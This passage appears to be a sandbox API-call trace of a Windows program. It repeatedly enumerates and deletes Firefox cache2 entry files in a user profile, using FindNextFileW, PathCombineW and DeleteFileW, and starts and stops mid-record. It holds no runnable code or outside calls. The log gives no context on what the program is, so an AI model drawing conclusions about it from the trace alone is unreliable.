"c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5289f8c4ab5388de2fcd562674edf6674fb6dd30")) returned 1 [0253.776] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.776] lstrlenW (lpString="529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3") returned 40 [0253.776] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3" [0253.776] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\529cd0d4c166c4989baaba7e5ff50f75fb1d22d3")) returned 1 [0253.777] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.777] lstrlenW (lpString="52ECE00B624C0C246123D20C46C3EE4F390A42FE") returned 40 [0253.777] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="52ECE00B624C0C246123D20C46C3EE4F390A42FE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\52ECE00B624C0C246123D20C46C3EE4F390A42FE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\52ECE00B624C0C246123D20C46C3EE4F390A42FE" [0253.777] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\52ECE00B624C0C246123D20C46C3EE4F390A42FE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\52ece00b624c0c246123d20c46c3ee4f390a42fe")) returned 1 [0253.778] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.778] lstrlenW (lpString="539C21F72CC831D883A265394E7125EFC208B096") returned 40 [0253.778] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="539C21F72CC831D883A265394E7125EFC208B096" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\539C21F72CC831D883A265394E7125EFC208B096") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\539C21F72CC831D883A265394E7125EFC208B096" [0253.778] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\539C21F72CC831D883A265394E7125EFC208B096" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\539c21f72cc831d883a265394e7125efc208b096")) returned 1 [0253.778] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.778] lstrlenW (lpString="53DAE4B1D7BFF6744CCAF7207DE631267F9883DC") returned 40 [0253.778] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="53DAE4B1D7BFF6744CCAF7207DE631267F9883DC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\53DAE4B1D7BFF6744CCAF7207DE631267F9883DC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\53DAE4B1D7BFF6744CCAF7207DE631267F9883DC" [0253.779] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\53DAE4B1D7BFF6744CCAF7207DE631267F9883DC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\53dae4b1d7bff6744ccaf7207de631267f9883dc")) returned 1 [0253.779] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.779] lstrlenW (lpString="53E9CAA90A10C82CF9C2D5393B332D17B263105E") returned 40 [0253.779] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="53E9CAA90A10C82CF9C2D5393B332D17B263105E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\53E9CAA90A10C82CF9C2D5393B332D17B263105E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\53E9CAA90A10C82CF9C2D5393B332D17B263105E" [0253.779] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\53E9CAA90A10C82CF9C2D5393B332D17B263105E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\53e9caa90a10c82cf9c2d5393b332d17b263105e")) returned 1 [0253.782] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.782] lstrlenW (lpString="54BF6D9D46D035228AC887ABC41B451F2BA38C02") returned 40 [0253.782] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="54BF6D9D46D035228AC887ABC41B451F2BA38C02" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\54BF6D9D46D035228AC887ABC41B451F2BA38C02") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\54BF6D9D46D035228AC887ABC41B451F2BA38C02" [0253.782] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\54BF6D9D46D035228AC887ABC41B451F2BA38C02" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\54bf6d9d46d035228ac887abc41b451f2ba38c02")) returned 1 [0253.782] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.782] lstrlenW (lpString="5588A68FFECF7B388E18C33727BF06B30B837DF1") returned 40 [0253.782] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5588A68FFECF7B388E18C33727BF06B30B837DF1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5588A68FFECF7B388E18C33727BF06B30B837DF1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5588A68FFECF7B388E18C33727BF06B30B837DF1" [0253.782] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5588A68FFECF7B388E18C33727BF06B30B837DF1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5588a68ffecf7b388e18c33727bf06b30b837df1")) returned 1 [0253.783] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.783] lstrlenW (lpString="559737B84286037BF56FE9E46C53581FB6FF6751") returned 40 [0253.783] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="559737B84286037BF56FE9E46C53581FB6FF6751" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\559737B84286037BF56FE9E46C53581FB6FF6751") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\559737B84286037BF56FE9E46C53581FB6FF6751" [0253.783] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\559737B84286037BF56FE9E46C53581FB6FF6751" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\559737b84286037bf56fe9e46c53581fb6ff6751")) returned 1 [0253.784] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.784] lstrlenW (lpString="56945BFE2B00EED1BE4F7B1F389030A0AF203742") returned 40 [0253.784] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="56945BFE2B00EED1BE4F7B1F389030A0AF203742" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56945BFE2B00EED1BE4F7B1F389030A0AF203742") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56945BFE2B00EED1BE4F7B1F389030A0AF203742" [0253.784] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56945BFE2B00EED1BE4F7B1F389030A0AF203742" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\56945bfe2b00eed1be4f7b1f389030a0af203742")) returned 1 [0253.784] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.784] lstrlenW (lpString="56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9") returned 40 [0253.784] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9" [0253.784] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\56b48b214c8c7ac2ce81efc4f92c4550fb675ae9")) returned 1 [0253.785] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.785] lstrlenW (lpString="56C1D667A6AFD5406F830882D54923461E079C1B") returned 40 [0253.785] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="56C1D667A6AFD5406F830882D54923461E079C1B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56C1D667A6AFD5406F830882D54923461E079C1B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56C1D667A6AFD5406F830882D54923461E079C1B" [0253.785] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\56C1D667A6AFD5406F830882D54923461E079C1B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\56c1d667a6afd5406f830882d54923461e079c1b")) returned 1 [0253.786] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.786] lstrlenW (lpString="5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC") returned 40 [0253.786] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC" [0253.786] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5740b2dd533a74c3d20dd1d045cf7090d3bfb1ac")) returned 1 [0253.786] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.786] lstrlenW (lpString="577655B6F15A0EEA0864C0703652DE24C091B634") returned 40 [0253.786] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="577655B6F15A0EEA0864C0703652DE24C091B634" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\577655B6F15A0EEA0864C0703652DE24C091B634") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\577655B6F15A0EEA0864C0703652DE24C091B634" [0253.786] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\577655B6F15A0EEA0864C0703652DE24C091B634" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\577655b6f15a0eea0864c0703652de24c091b634")) returned 1 [0253.787] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.789] lstrlenW (lpString="5781F439935B6472D7D312E75A3B766C3E30CF60") returned 40 [0253.789] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5781F439935B6472D7D312E75A3B766C3E30CF60" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5781F439935B6472D7D312E75A3B766C3E30CF60") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5781F439935B6472D7D312E75A3B766C3E30CF60" [0253.789] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5781F439935B6472D7D312E75A3B766C3E30CF60" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5781f439935b6472d7d312e75a3b766c3e30cf60")) returned 1 [0253.790] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.790] lstrlenW (lpString="579EC9227C4A988DCC4894D82AA161957107515D") returned 40 [0253.790] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="579EC9227C4A988DCC4894D82AA161957107515D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\579EC9227C4A988DCC4894D82AA161957107515D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\579EC9227C4A988DCC4894D82AA161957107515D" [0253.790] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\579EC9227C4A988DCC4894D82AA161957107515D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\579ec9227c4a988dcc4894d82aa161957107515d")) returned 1 [0253.791] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.791] lstrlenW (lpString="57E662573FD9E42D3972BE92D3DF0557C7B2E836") returned 40 [0253.791] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="57E662573FD9E42D3972BE92D3DF0557C7B2E836" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\57E662573FD9E42D3972BE92D3DF0557C7B2E836") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\57E662573FD9E42D3972BE92D3DF0557C7B2E836" [0253.791] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\57E662573FD9E42D3972BE92D3DF0557C7B2E836" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\57e662573fd9e42d3972be92d3df0557c7b2e836")) returned 1 [0253.792] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.792] lstrlenW (lpString="57FB9388D9B054D289CC913E797B5C5217B6A217") returned 40 [0253.792] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="57FB9388D9B054D289CC913E797B5C5217B6A217" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\57FB9388D9B054D289CC913E797B5C5217B6A217") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\57FB9388D9B054D289CC913E797B5C5217B6A217" [0253.792] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\57FB9388D9B054D289CC913E797B5C5217B6A217" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\57fb9388d9b054d289cc913e797b5c5217b6a217")) returned 1 [0253.792] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.792] lstrlenW (lpString="58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE") returned 40 [0253.792] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE" [0253.792] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\58a845fd76589b14ef62bb6cfea62db0c7ccfbbe")) returned 1 [0253.793] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.793] lstrlenW (lpString="58BFE77FA719F36CE48D4A317C753C845C38FE29") returned 40 [0253.793] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="58BFE77FA719F36CE48D4A317C753C845C38FE29" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\58BFE77FA719F36CE48D4A317C753C845C38FE29") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\58BFE77FA719F36CE48D4A317C753C845C38FE29" [0253.794] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\58BFE77FA719F36CE48D4A317C753C845C38FE29" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\58bfe77fa719f36ce48d4a317c753c845c38fe29")) returned 1 [0253.795] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.795] lstrlenW (lpString="59248032DB55D8A9E0296A51BC66F3DEA6028EA5") returned 40 [0253.795] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="59248032DB55D8A9E0296A51BC66F3DEA6028EA5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59248032DB55D8A9E0296A51BC66F3DEA6028EA5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59248032DB55D8A9E0296A51BC66F3DEA6028EA5" [0253.795] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59248032DB55D8A9E0296A51BC66F3DEA6028EA5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\59248032db55d8a9e0296a51bc66f3dea6028ea5")) returned 1 [0253.795] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.795] lstrlenW (lpString="592BC6129BB410343931D35AFB0FE270C66E58F0") returned 40 [0253.795] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="592BC6129BB410343931D35AFB0FE270C66E58F0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\592BC6129BB410343931D35AFB0FE270C66E58F0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\592BC6129BB410343931D35AFB0FE270C66E58F0" [0253.795] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\592BC6129BB410343931D35AFB0FE270C66E58F0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\592bc6129bb410343931d35afb0fe270c66e58f0")) returned 1 [0253.796] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.796] lstrlenW (lpString="59BB52B352DE6D0ED5D0376B33855D43CA80B3F7") returned 40 [0253.796] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="59BB52B352DE6D0ED5D0376B33855D43CA80B3F7" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59BB52B352DE6D0ED5D0376B33855D43CA80B3F7") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59BB52B352DE6D0ED5D0376B33855D43CA80B3F7" [0253.796] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59BB52B352DE6D0ED5D0376B33855D43CA80B3F7" (normalized: 